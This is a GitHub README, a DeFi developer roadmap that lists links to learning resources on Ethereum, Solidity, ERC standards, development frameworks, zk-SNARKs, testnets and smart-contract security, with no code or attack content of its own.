- [Korean](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_ko.md)
- [Japanese](https://www.wenyanet.com/opensource/ja/6304f1549168d4612c5c5064.html)
- [Italiano](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_it.md)
- [Telugu](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_tel.md)
- [Gujarati](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_guj.md)
- [Spanish](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_es.md)
- [Chinese](https://github.com/OffcierCia/DeFi-Developer-Road-Map/blob/main/translations/README_cn.md)
</details>
| Topic | Instant Link |
| :--------------: | ------------------------------------------------------------------------------------------------------------------------- |
| Basics | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#basics) |
| dApps | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#dapps) |
| Frameworks | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#frameworks) |
| zk-snarks | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#zk-snarks) |
| Further Readings | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#further-readings) |
| Security | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#security--safety) |
| DeFi | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#defi) |
| ENS | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-name-service) |
| NFT | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#non-fungible-token-nft) |
| Stable Coins | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#stable-coins) |
| General Info | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-tools) |
| Side Chains | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#side-chains) |
| MEV | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#mev---maximal-extractable-value--miner-extractable-value) |
| Tools Collection | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#tools-collection) |
| ETH 2.0 | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#ethereum-20) |
| Front End | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#front-end) |
| Project Manag. | [Explore](https://github.com/OffcierCia/DeFi-Developer-Road-Map#project-management) |
#
**| Special Notes:**
- [My Blog on Mirror](https://officercia.mirror.xyz/UpFfG7-1E4SDJttnmuQ7v4BMc4KrCXzo80vtx7qV-YY)
- [All known smart contract-side and user-side attacks & attack vectors](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)
- [Key principles of storing crypto cold wallet attacks defense methods best practices](https://officercia.mirror.xyz/p1ieZdxQWH4yHCNOXNPHyT8So1cY0X_wMGKwdmavi7s)
- [An awesome cheatsheet from the Pessimistic.io Team](https://graph.org/All-resources-to-become-a-smart-contract-auditor-09-11)
- [All-about-NFT security ](https://graph.org/NFT-security-01-28)
- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)
- [All good TG Dev communities ](https://graph.org/Crypto-Telegram-Channels--Chats-04-19)
- [Solidity language cheatsheets, tools and references collection](https://graph.org/Solidity-Cheatsheets-Pack-03-20)
- [Solidity Tutorials](https://telegra.ph/Solidity-Tutorials-12-21)
# Basics:
- Learn the basics of Distributed Ledger Technology (DLT)
- Bitcoin protocol [Explained](https://medium.com/coinmonks/bitcoin-white-paper-explained-part-1-4-16cba783146a)
- Elliptic Curve [Cryptography](https://medium.com/coinmonks/learn-how-to-code-elliptic-curve-cryptography-a952dfdc20ab)
- Read [Blockchain Explained](https://www.investopedia.com/terms/b/blockchain.asp)
- Watch [Blockchain - A visual demo](https://www.youtube.com/watch?v=_160oMzblY8)
- Watch [But how does bitcoin actually work? - 3b1b](https://www.youtube.com/watch?v=bBC-nXj3Ng4)
- Learn the basics of [Computer Science](https://github.com/ossu/computer-science)
- Learn DeFi In-Depth - just [watch this YouTube playlist](https://www.youtube.com/@campbellharvey/playlists)
- Teach yourself crypto - visit [teachyourselfcrypto.com](https://teachyourselfcrypto.com)
#### Ethereum
- Learn the basics of Ethereum
- Ethereum Virtual Machine (EVM): turing complete
- Learn about Wallets, Accounts (EOA), Private/Public Keys
- Learn about transactions, Gas, Metamask
- Ethereum clients/Nodes, Geth
- Infura infrastructure
#### EVM
- [NOXX](https://noxx.substack.com/archive?sort=new)
- [Digging deep into the EVM mechanics during contract function calls - Part 1](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy?utm_source=profile&utm_medium=reader2)
- [Let's take a trip down memory lane - Part 2](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-d6b?utm_source=profile&utm_medium=reader2)
- [Demystifying Storage Slot Packing - Key Knowledge for the EVM Hackers - Part 3](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-3ea?utm_source=profile&utm_medium=reader2)
- [Under The Hood - Storage Opcodes In the Go Ethereum (Geth) Client - Part 4](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-5a5?utm_source=profile&utm_medium=reader2)
- [Another Weapon in the EVM Hackers Arsenal - The Power of Delegate Call - Part 5](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-a5f?utm_source=profile&utm_medium=reader2)
- [A Treasure Trove of Data - Transaction Receipts & Event Logs - Part 6](https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-16e?utm_source=profile&utm_medium=reader2)
- [Understanding Trie Databases in Ethereum](https://medium.com/shyft-network/understanding-trie-databases-in-ethereum-9f03d2c3325d)
- [AskMirror](https://www.askmirror.xyz)
- [EVM Chad](https://github.com/mektigboy/evm-chad)
- [Mudit.Blog](https://mudit.blog)
- [Academic_Smart_Contract_Papers](https://github.com/hzysvilla/Academic_Smart_Contract_Papers)
- [cmichel.io](https://cmichel.io)
- [samczsun.com](https://samczsun.com)
- [serial-coder.com](https://www.serial-coder.com/posts)
- [notonlyowner.com](https://www.notonlyowner.com)
- [Decentralised](https://t.me/decentraliseddotco)
- [Awesome Blogs](https://start.me/w/nPprJD)
- [What happens when you send 1 DAI](https://www.notonlyowner.com/learn/what-happens-when-you-send-one-dai)
- [The Complete Guide to Full Stack Ethereum Development](https://www.useweb3.xyz/tutorials/the-complete-guide-to-full-stack-ethereum-development)
- [Ultimate roadmap for web3 developers "from zero to master"](https://blog.praneethreddy.me/ultimate-roadmap-for-web3-developers-from-zero-to-master?deviceType=desktop)
- [Solidity Cheatsheets Pack + Bonus](https://telegra.ph/Solidity-Cheatsheets-Pack-03-20)
- [L2s Explained](https://www.youtube.com/live/GnXQiFJlf2w?feature=share)
#### Check out
- A bunch of learning resources to choose from here: [pentacle.xyz](https://pentacle.xyz/projects?section=developer&category=learn)
- [EVM In-Depth](https://youtu.be/RxL_1AfV7N4)
- [LearnEVM](https://twitter.com/learnevm)
- [Useful Solidity Patterns](https://github.com/dragonfly-xyz/useful-solidity-patterns/tree/main/patterns/off-chain-storage)
- [CryptoBook](https://toc.cryptobook.us/book.pdf)
- [Smart Contract Auditing Checklist](https://github.com/vishnuram1999/Smart-Contract-Auditing-Checklist)
#### Directions
- [Awesome roadmap.sh RoadMaps Collection](https://roadmap.sh)
- [Vikvikvikkk Repo](https://github.com/vikvikvikkk?tab=repositories)
- [Awesome Ethereum Staking](https://hackmd.io/@jyeAs_6oRjeDk2Mx5CZyBw/awesome-ethereum-staking)
- [The Daily Ape](https://www.notion.so/The-Daily-Ape-c96c0b6727c0433a962e897ef43efb7e)
- [Sov's Compendium](https://sovs.notion.site/sovs/Sov-s-Compendium-41f097d28dae4d09801f10cde1b2d03b)
- [Diamond Crab](https://shuennnyyy.notion.site/shuennnyyy/DiamondCrab-Crypto-Notion-Site-5e14308d396b497fa35ccdbfdf4a2296)
- [Immersion Den](https://immersionden.xyz)
- [Curious Daddy](https://curiousaddys.notion.site/2935b6c3a1e249fd876ce3f318355d92?v=b46dd3524e8a4ea9873f364800a0db38)
- [Awesome Blogs](https://start.me/w/nPprJD)
- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)
- [Main Navigation](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)
- [Solidity Tutorials](https://graph.org/Solidity-Tutorials-12-21)
- [Solana Dev & Degen Tools Packk](https://web.archive.org/web/20220820001542/officercia.mirror.xyz/XLEds6Py1Xu41WWhqv-LJ2UtH4UKl9cZTnoVx8CvDXQ)
- [Genesis 0x01: Simplified Roadmap for Blockchain Security](https://devansh.xyz/blockchain-security/2021/09/17/genesis-0x01.html)
- [Blockchain security guide](https://wufflz.notion.site/Blockchain-security-guide-b26aec3d920e414d8a354618d3e36eb4)
- [DevPill](https://www.devpill.me/docs/introduction/foreword)
- [Retrospective: Hacks in Web3](https://medium.com/@officercia/retrospective-hacks-in-web3-cc83b8ee0e93)
- [Medium : severity vulns](https://tom-sol.notion.site/c433c81fc5964fb8b32c59ce98fec3df?v=c5ffb5c86778424c9a1fe3dd6f7f00f3)
- [High : severity vulns](https://tom-sol.notion.site/f9d3a62122d34b479b52ea3e0583bd57?v=9c303b31cca845638e78c25da29fa5de)
- [Repository of 500 web3 reports](https://drive.google.com/drive/u/2/mobile/folders/1oyGnZE2ce5t6MZ1ytMLDr5OKuQAOkEdR?pli=1)
#### Smart Contract
- Basics of Smart Contract: [Top 10 free Web3 courses](https://twitter.com/vedangvatsa/status/1627648600254840832)
- Life Cycle of Smart Contract
- Ethereum Higher Level languages (**Solidity**, Vyper, LLL, Serpent)
- Compiling, testing, Deploying smart Contracts
- Interacting with smart contracts using web3.js or web3.py
- Read [How does Ethereum work, anyway?](https://www.preethikasireddy.com/post/how-does-ethereum-work-anyway#:~:text=The%20Ethereum%20blockchain%20uses%20an,tokens%20are%20generated%20and%20awarded.)
- Read [this article](https://blog.zeppelin.solutions/the-hitchhikers-guide-to-smart-contracts-in-ethereum-848f08001f05)
- Read the [Truffle Documentation](https://truffleframework.com/docs/) / [Hardhat Documentation](https://hardhat.org/getting-started/)
- Read the [Web3 Documentation](https://web3js.readthedocs.io/en/1.0/) / [Ethers Documentation](https://docs.ethers.io/v5/)
- Read Book [Mastering Ethereum](https://github.com/ethereumbook/ethereumbook) and watch [this channel](https://www.youtube.com/channel/UCJWh7F3AFyQ_x01VKzr9eyA/videos)
- Read [Solidity Smart Contract Library](https://openzeppelin.org/api/docs/get-started.html) and [Solidity Base](https://solidity-by-example.org) with [Tutorial from Zombies](https://cryptozombies.io)
- Read [Flash Crash for Cash Cyber Threats in Decentralized Finance](https://arxiv.org/pdf/2106.10740.pdf)
#### Resources to learn Solidity
- [cryptozombies.io](https://cryptozombies.io)
- [smartcontract.engineer](https://www.smartcontract.engineer)
- [solidity-by-example.org](https://solidity-by-example.org)
- [useweb3.xyz](https://www.useweb3.xyz)
- [Solidity Tutorials](https://graph.org/Solidity-Tutorials-12-21)
- [Books & Researches](https://telegra.ph/Books--Researches-01-30)
- [Navigation: officercia.eth](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)
- [Solidity Cheatsheets Pack + Bonus](https://graph.org/Solidity-Cheatsheets-Pack-03-20)
- [Solidity Treasures](https://t.me/soliditypedia)
- [Solidity Learning Chat](https://t.me/solidity_learning)
- [Dev Solidity Chat](https://t.me/dev_solidity)
- [Crypto Telegram & Discord Channels & Chats](https://telegra.ph/Crypto-Telegram-Channels--Chats-04-19)
- [Slitherin](https://github.com/pessimistic-io/slitherin)
- [WTF Solidity](https://github.com/AmazingAng/WTF-Solidity)
#### Smart Contract Standards
- [ERCs](https://eips.ethereum.org/erc) - Ethereum Improvement Proposals
#### Tokens
- [ERC-20](https://eips.ethereum.org/EIPS/eip-20) - Token contract for fungible assets.
- [ERC-721](https://github.com/ethereum/eips/issues/721) - Token standard for non-fungible assets.
- [ERC-1155](https://eips.ethereum.org/EIPS/eip-1155) - Token standard for semi-fungible tokens
- [ERC-918](https://eips.ethereum.org/EIPS/eip-918) - Mineable Token Standard.
- [ERC-1363](https://eips.ethereum.org/EIPS/eip-1363) - Payable Token Standard.
- [ERC-4626](https://eips.ethereum.org/EIPS/eip-4626) - Tokenized Vault Standard.
- [Token Interaction Checklist](https://consensys.net/diligence/blog/2020/11/token-interaction-checklist/)
#### Others
- [ERC-165](https://eips.ethereum.org/EIPS/eip-165) - Creates a standard method to publish and detect what interfaces a smart contract implements.
- [ERC-725](https://eips.ethereum.org/EIPS/eip-725) - A standard interface for a simple proxy account.
- [ERC-173](https://eips.ethereum.org/EIPS/eip-173) - A standard interface for ownership of contracts.
#### General Development Skills
- Learn [GIT](https://medium.com/pixel-pioneers/the-basics-of-version-control-system-git-explained-by-designing-a-new-car-3fb3a10e9e40)
- Create a few repositories on [GitHub](https://github.com/) / [GitLab](https://about.gitlab.com/)
- Share your code with other people
- know HTTP(S) protocol, request methods (GET, POST, PUT, PATCH, DELETE, OPTIONS)
- Don't be afraid of using Google, [Power Searching with Google](http://www.powersearchingwithgoogle.com/)
- Get familiar with terminal ([Linux/Docker](https://medium.com/coinmonks/how-to-become-a-blockchain-developer-59c830e20f15)), configure your shell (bash, zsh, fish)
- Read a few books about algorithms and data structures, blockchain, Ethereum, solidity
- Do this course [Ethereum and Solidity: The Complete Developer's Guide](https://www.udemy.com/ethereum-and-solidity-the-complete-developers-guide/)
- Free tutorial [Learning Solidity](https://github.com/willitscale/learning-solidity)
- [Introduction to Smart Contract Development with Solidity](https://www.youtube.com/playlist?list=PLV1JDFUtrXpGvu8QHL9b78WYNSJsYNZsb) and [ERC20 Programming](https://www.youtube.com/watch?v=Hqx5yuskmRU&list=PLYSZ-f9LCH3sEf0UKTLCaZErJeQtK7GCD)
- [Tudelft Repo](https://repository.tudelft.nl)
#### Try this tools:
- [eth-cli](https://github.com/protofire/eth-cli) - CLI tools.
- [REPL](https://github.com/raineorshine/solidity-repl) - Solidity REPL.
- [Remix](https://remix.ethereum.org/) - Online realtime compiler and runtime.
- [gencall-cli](https://github.com/manifoldfinance/libcaller/tree/master/packages/gencall-cli) - An interractive smart contract encoder and sender from your ABI file
- [Web3modal](https://github.com/WalletConnect/web3modal)
- [Optimize Solidity Function Name](https://emn178.github.io/solidity-optimize-name/) - Optimize function names to reduce costs
- [solc-typed-ast compiler](https://github.com/ConsenSys/solc-typed-ast) - TypeScript package providing a normalized typed Solidity AST along with the utilities necessary to generate the AST (from Solc) and traverse/manipulate it.
- [Slither Explained - for audit](https://telegra.ph/Slither-Explained-04-19)
# dApps
- Get familiar with tools that you will be using:
#### Package Managers
- [npm](https://www.npmjs.com/)
- [yarn](https://yarnpkg.com/lang/en/)
- [pnpm](https://pnpm.js.org/)
#### IDE's
- [Remix IDE](https://remix.ethereum.org/)
- [Remix IDE Desktop Release](https://github.com/ethereum/remix-desktop/releases)
- [Ethfiddle](https://ethfiddle.com/)
- [labs.superblock](https://superblocks.com/)
- [Truffle](https://truffleframework.com/)
- [Solidity v0.8.17](https://docs.soliditylang.org/en/v0.8.17/)
- [Vyper](https://github.com/vyperlang/vyper)
- [Atom](https://atom.io/)
- [Etheratom](https://atom.io/packages/etheratom)
- [Autocomplete Solidity](https://atom.io/packages/autocomplete-solidity)
- [Language Solidity](https://atom.io/packages/language-solidity)
- [Vim solidity](https://github.com/tomlion/vim-solidity)
- [Vim vyper](https://github.com/vyperlang/vim-vyper)
- [YAKINDU Solidity Tools](https://github.com/Yakindu/solidity-ide)
- [VSCode](https://code.visualstudio.com/) with [Solidity Visual Developer](https://marketplace.visualstudio.com/items?itemName=tintinweb.solidity-visual-auditor)
- [vscode-solidity-lang](https://github.com/contractshark/vscode-solidity-extenstion) Solidity Semantic Highlighting for VSode. [available at vscode marketplace](https://marketplace.visualstudio.com/items?itemName=ContractShark.solidity-lang)
- [MetaMask OpenRCP API Playground](https://metamask.github.io/api-playground/api-documentation/) - View and Interact with MetaMasks RPC API
#### Practice
- Learn Ethereum development by making a [Zombie Game](https://cryptozombies.io/)
- [Yul and Some Solidity Optimizations and Tricks](https://hackmd.io/@gn56kcRBQc6mOi7LCgbv1g/rJez8O8st)
- Read and make and example: [Pet shop tutorial](https://www.trufflesuite.com/tutorial)
- Learn how to build smart contracts with Python and Vyper: [Ape Academy](https://academy.apeworx.io/)
- [Time-locked Wallets: An Introduction to Ethereum Smart Contracts](https://www.toptal.com/ethereum-smart-contract/time-locked-wallet-truffle-tutorial)
- [The Ultimate ENS and ĐApp Tutorial](https://www.toptal.com/ethereum/ethereum-name-service-dapp-tutorial)
- [Ultimate Introduction to Ethereum Ðapp Development](https://www.youtube.com/playlist?list=PLV1JDFUtrXpFh85G-Ddyy2kLSafaB9biQ)
- [Ethernaut](https://ethernaut.zeppelin.solutions/) is a Web3/Solidity based wargame for those interested in learning ethereum
- [Ethereum and Solidity: The Complete Developer's Guide](https://www.udemy.com/ethereum-and-solidity-the-complete-developers-guide/)
- [Consensys best practices](https://consensys.github.io/smart-contract-best-practices/) - This document provides a baseline knowledge of security considerations for intermediate Solidity programmers. It is maintained by ConsenSys Diligence, and the broader Ethereum community.
- [Solidity Patterns](https://github.com/fravoll/solidity-patterns) - A compilation of patterns and best practices.
- [Smart Contracts Threats DB](https://github.com/crytic/not-so-smart-contracts) - A compilation of the worst patterns.
- [ETH.build](https://eth.build/) An Educational Sandbox For Web3
- [Node Guardians](https://nodeguardians.io/) Story-rich Quests with practical coding challenges
# ZK-SNARKs
#### General info
- [ZK-SNARKs-VS-ZK-STARKs](https://graph.org/ZK-SNARKs-VS-ZK-STARKs-01-10)
- [Why and How zk-SNARK Works: Definitive Explanation](https://arxiv.org/pdf/1906.07221.pdf)
- [learn.0xparc.org](https://learn.0xparc.org)
- [ProofsArgsAndZK.pdf](https://people.cs.georgetown.edu/jthaler/ProofsArgsAndZK.pdf)
- [zk-learning.org](https://zk-learning.org)
- [zero-knowledge-canon](https://a16zcrypto.com/zero-knowledge-canon)
- [Introduction to Zero-Knowledge Proofs](https://www.dylandavis.net/blog/2022/12/21/zero-knowledge-proofs-introduction)
- [Zero-knowledge proof learning journey](https://youtu.be/_6Bm5kmov3A)
- [zkp.science](https://zkp.science) - All you should know about ZK-SNARKs
- [ZoKrates](https://github.com/Zokrates/ZoKrates) - A toolbox for zkSNARKS on Ethereum
- [The AZTEC Protocol](https://github.com/AztecProtocol/AZTEC) - Confidential transactions on the Ethereum network, implementation is live on the Ethereum main-net
- [Nightfall](https://github.com/EYBlockchain/nightfall) - Make any ERC-20 / ERC-721 token private - open source tools & microservices
- Proxy Re-encryption (PRE)
- [NuCypher Network](https://github.com/nucypher/nucypher) - A proxy re-encryption network to empower data privacy in decentralized systems
- [pyUmbral](https://github.com/nucypher/pyumbral) - Threshold proxy re-encryption cryptographic library
- Fully Homomorphic Encryption (FHE)
- [NuFHE](https://github.com/nucypher/nufhe) - GPU accelerated FHE library
- [Zero knowledge proofs starter pack](https://ethresear.ch/t/zero-knowledge-proofs-starter-pack/4519)
- [ZK-Research DB](https://polished-wash-d17.notion.site/ZK-Research-58f704196c8f4715adc412fa0cf1a17f)
- [An awesome post from Vitalik.eth](https://vitalik.ca/general/2021/01/26/snarks.html)
- [Zk snarks under the hood](https://medium.com/@VitalikButerin/zk-snarks-under-the-hood-b33151a013f6)
- [Awesome zero knowledge proofs](https://github.com/matter-labs/awesome-zero-knowledge-proofs)
- [Awesome zk](https://github.com/ventali/awesome-zk)
- [The missing explanation of ZK-SNARKs](https://www.cryptologie.net/article/507/the-missing-explanation-of-zk-snarks)
- [Why and How zk-SNARK Works](https://arxiv.org/pdf/1906.07221.pdf)
- [The Zero-Knowledge Landscape](https://page1.substack.com/p/the-zero-knowledge-landscape)
- [Your Guide to Write zkSNARKs in Go](https://consensys.net/blog/research-development/gnark-your-guide-to-write-zksnarks-in-go)
- [Building your first zk dapp using snarks & circom](https://hackernoon.com/how-to-use-a-zero-knowledge-dapp-boilerplate)
- [ZK Tools Directory & Boilerplate](https://boilerplate.zkblock.app/)
- [A beginner's intro to coding zero-knowledge proofs](https://dev.to/spalladino/a-beginners-intro-to-coding-zero-knowledge-proofs-c56)
#### ZK-STARKs
- [StarkWare](https://github.com/starkware-industries) and [StarkWare Resources](https://github.com/starkware-libs) - StarkEx scalability engine storing state transitions on-chain
- [zkSNARKs vs zkSTARKs: a primer](https://pseudotheos.mirror.xyz/_LAi4cCFz2gaC-3WgNmri1eTvckA32L7v31A8saJvqg)
- [Breaking Down Recursive ZK-STARKs](https://medium.com/@Nurnberg_Meistersinger/zk-starks-part-one-4f482111b0a)
# Frameworks
#### Truffle Suite
- [Truffle](https://truffleframework.com/truffle)
- [Ganache](https://truffleframework.com/ganache)
- [Drizzle](https://truffleframework.com/drizzle)
#### Akula
- [Akula](https://github.com/akula-bft/akula) - an implementation of Ethereum protocol ("client") written in Rust, based on [Erigon](https://github.com/ledgerwatch/interfaces) architecture.
#### ZeppelinOS
- [Getting Started](https://docs.zeppelinos.org/docs/start.html)
#### Labs.Superblock
> Note: Superblocks is depreciated
- [Labs.superblocks](https://lab.superblocks.com/)
- [dapp Tutorial](https://www.youtube.com/watch?v=LK-kVMzrdno)
#### Infura (A Gateway to Ethereum)
- [Mainnet End Point](https://infura.io/)
- [Ropsten TestNet End Point](https://infura.io/)
- [Kovan TestNet End Point](https://infura.io/)
- [Rinkby TestNet End Point](https://infura.io/)
- [IPFS](https://medium.freecodecamp.org/hands-on-get-started-with-infura-and-ipfs-on-ethereum-b63635142af0)
#### [NodeReal](https://nodereal.io)(A high-performance node service)
- [Meganode](https://meganode.nodereal.io)
- [DirectRoute](https://directroute.nodereal.io)
#### Other Frameworks
- [Frameworks List](https://ethereum.org/en/developers/docs/frameworks/) - Ethereum Frameworks Listing.
- [Hardhat](https://hardhat.org/) - Flexible, extensible and fast Ethereum development environment.
- [Ape](https://docs.apeworx.io/ape/stable/) - The smart contract development tool for Pythonistas, Data Scientists, and Security Professionals.
- [Brownie](https://github.com/iamdefinitelyahuman/brownie) - Brownie is a Python framework for deploying, testing and interacting with Ethereum smart contracts.
- [Embark](https://github.com/embark-framework/embark) - Framework for DApp development
- [Waffle](https://getwaffle.io/) - Framework for advanced smart contract development and testing, small, flexible, fast (based on ethers.js)
- [Etherlime](https://github.com/LimeChain/etherlime) - ethers.js based framework for Dapp deployment
- [Parasol](https://github.com/Lamarkaz/parasol) - [Depreciated] Agile smart contract development environment with testing, INFURA deployment, automatic contract documentation and more. It features a flexible and unopinionated design with unlimited customizability
- [0xcert](https://github.com/0xcert/framework/) - JavaScript framework for building decentralized applications
- [OpenZeppelin SDK](https://openzeppelin.com/sdk/) - OpenZeppelin SDK: A suite of tools to help you develop, compile, upgrade, deploy and interact with smart contracts.
- [sbt-ethereum](https://sbt-ethereum.io/) - A tab-completey, text-based console for smart-contract interaction and development, including wallet and ABI management, ENS support, and advanced Scala integration.
- [Cobra](https://github.com/cobraframework/cobra) - A fast, flexible and simple development environment framework for Ethereum smart contract, testing and deployment on Ethereum virtual machine(EVM).
- [Ether Jar](https://github.com/emeraldpay/etherjar) Java integration library for Ethereum blockchain
- [Starport](https://github.com/tendermint/starport) - A CLI tool for building sovereign IBC-enabled blockchains.
- [Sign in with Ethereum | SIWE](https://github.com/spruceid/siwe)- Workflow to authenticate Ethereum accounts using message signing in order to establish a cookie-based web session that manages user metadata.
- [Foundry](https://github.com/onbjerg/foundry-book) - A smart contract development toolchain for project compilation, dependency management, testing, deployments, on-chain interactions...
- [Solmate](https://github.com/Rari-Capital/solmate) - These contracts have been audited but they were not developed with users in mind. They mainly seek to optimize gas and optimizations for smart contract development
- [Supercool](https://docs.supercool.xyz/) - Relayer infra for meta-transaction and account-abstraction superpowers: automate smart contract interactions, create gasless transactions, and more.
#### Interacting with Smart Contract
- [Web3.js](https://web3js.readthedocs.io/en/1.0/)
- [Web3.py](https://web3py.readthedocs.io/en/stable/)
- [Web3j](https://docs.web3j.io/latest/)
- [ethers.js](https://docs.ethers.io/v5/)
- [Web3 by Example : Web3 by Example is a hands-on introduction to web3 development using annotated example programs.](https://www.web3byexample.com/)
#### Python Ethereum Eco System
- [Ethereum.org](https://ethereum.org/en/developers/docs/programming-languages/python/)
- [Article](https://medium.com/@pipermerriam/the-python-ethereum-ecosystem-101bd9ba4de7)
#### Distributed Storage Systems
- [Arweave](https://arweave.org)
- [INFO](https://medium.com/bitfwd/what-is-decentralised-storage-ipfs-filecoin-sia-storj-swarm-5509e476995f)
- [IPFS](https://ipfs.io/)
- [MESON](https://meson.network/)
- [SWARM](https://swarm-gateways.net/)
- [Storej](https://storj.io/)
- [Sia](https://sia.tech/)
#### Test Blockchain Networks
- [Paradigm Faucet](https://faucet.paradigm.xyz) - claim testnet ETH here
- [Ethnode](https://github.com/vrde/ethnode) - Run an Ethereum node (Geth or Parity) for development, as easy as `npm i -g ethnode && ethnode`.
- [Ganache](https://github.com/trufflesuite/ganache) - App for test Ethereum blockchain with visual UI and logs
- [Kaleido](https://kaleido.io/) - Use Kaleido for spinning up a consortium blockchain network. Great for PoCs and testing
- [Besu Private Network](https://besu.hyperledger.org/en/stable/Tutorials/Quickstarts/Azure-Private-Network-Quickstart/) - Run a private network of Besu nodes in a Docker container
- [Orion](https://github.com/PegaSysEng/orion) - Component for performing private transactions by PegaSys
- [Artemis](https://github.com/PegaSysEng/artemis) - Java implementation of the Ethereum 2.0 Beacon Chain by PegaSys
- [Cliquebait](https://github.com/f-o-a-m/cliquebait) - Simplifies integration and accepting testing of smart contract applications with docker instances that closely resembles a real blockchain network
- [Local Raiden](https://github.com/ConsenSys/Local-Raiden) - Run a local Raiden network in docker containers for demo and testing purposes
- [Private networks deployment scripts](https://github.com/ConsenSys/private-networks-deployment-scripts) - Out-of-the-box deployment scripts for private PoA networks
- [Local Ethereum Network](https://github.com/ConsenSys/local_ethereum_network) - Out-of-the-box deployment scripts for private PoW networks
- [Ethereum on Azure](https://docs.microsoft.com/en-us/azure/blockchain/templates/ethereum-poa-deployment) - Deployment and governance of consortium Ethereum PoA networks
- [Ethereum on Google Cloud](https://console.cloud.google.com/marketplace/details/click-to-deploy-images/ethereum?filter=category:developer-tools) - Build Ethereum network based on Proof of Work
- [Infura](https://infura.io/) - Ethereum API access to Ethereum networks (Mainnet, Ropsten, Rinkeby, Goerli, Kovan)
- [CloudFlare Distributed Web Gateway](https://cloudflare.com/distributed-web-gateway/) - Provides access to the Ethereum network through the Cloudflare instead of running your own node
- [Chainstack](https://chainstack.com/) - Shared and dedicated Ethereum nodes as a service (Mainnet, Ropsten, Rinkeby)
- [Alchemy](https://alchemyapi.io/) - Blockchain Developer Platform, Ethereum API, and Node Service (Mainnet, Ropsten, Rinkeby, Goerli, Kovan)
- [ZMOK](https://zmok.io/) - JSON-RPC Ethereum API (Mainnet, Rinkeby, Front-running Mainnet)
- [Watchdata](https://watchdata.io) - Provide simple and reliable API access to Ethereum blockchain
#### Test Ether Faucets
- [Sepolia Faucet](https://sepoliafaucet.com/)
- [Mumbai Faucet](https://mumbaifaucet.com/)
- [Goerli faucet](https://goerli-faucet.slock.it/)
- [Universal faucet](https://faucets.blockxlabs.com/)
- [Nethereum.Faucet](https://github.com/Nethereum/Nethereum.Faucet) - A C#/.NET faucet
# Front End
#### UI Components
- Learn React on [official website](https://reactjs.org/tutorial/tutorial.html) or complete some [courses](https://egghead.io/courses/the-beginner-s-guide-to-react)
- [React Roadmap](https://github.com/adam-golab/react-developer-roadmap)
- [aragonUI](https://ui.aragon.org) - A React library including Dapp components
- [components.bounties.network](https://components.bounties.network) - A React library including Dapp components
- [ui.decentraland.org](https://github.com/decentraland/ui) - A React library including Dapp components
- [dapparatus](https://github.com/austintgriffith/dapparatus) - Reusable React Dapp components
- [Metamask ui](https://github.com/MetaMask/metamask-storybook) - Metamask React Components
- [DappHybrid](https://github.com/Nethereum/Nethereum.DappHybrid) - A cross-platform hybrid hosting mechanism for web based decentralised applications
- [Nethereum.UI.Desktop](https://github.com/Nethereum/Nethereum.UI.Desktop) - Cross-platform desktop wallet sample
- [eth-button](https://eth-button.github.io/eth-button/) - Minimalist donation button
- [Rimble Design System](https://rimble.consensys.design/) - Adaptable components and design standards for decentralized applications.
- [brave-ui](https://github.com/brave/brave-ui) - List of reusable React components to empower your brave UI
- [DApp frontend security](https://blog.embarklabs.io/news/2020/01/30/dapp-frontend-security/index.html) - In this article, Author will take a look at security for DApps.
# Project management
- [Dework](https://dework.xyz/) | Web3 Trello with token payments, credentials, bounties...
- [Wonderverse](https://www.wonderverse.xyz/) | Jira alternative with an intuitive task management system that allows DAOs to pay contributors and collaborate in their projects.
# Important (security)
- [Building Secure Smart Contracts](https://secure-contracts.com/)
- [SCSVS](https://github.com/ComposableSecurity/SCSVS)
- [Solidity audits and secure development material](https://github.com/jcr-security/solidity-security-teaching-resources)
- [SCSVSv2](https://github.com/ComposableSecurity/SCSVS)
- [Valuable Resources for Web3 Security](https://github.com/ZhangZhuoSJTU/Web3Bugs#valuable-resources-for-web3-security)
# Further Readings
#### Inspired by:
- [ETH Dapp Developer Roadmap](https://github.com/thecryptoshed/eth-dapp-developer-roadmap)
- [DeFi Defence DAO Tools](https://github.com/defi-defense-dao/defi-risk-tools-list#developer-tools)
- [Blockchain Learning Path](https://github.com/protofire/blockchain-learning-path)
- [ADF](https://github.com/ong/awesome-decentralized-finance)
- [DeFi Toolkit](https://github.com/gweicz/defi-toolkit)
- [BlockTools](https://github.com/nujabes403/blockchains-tools)
- [SAW List](https://simpleaswater.com/defi/#analytics)
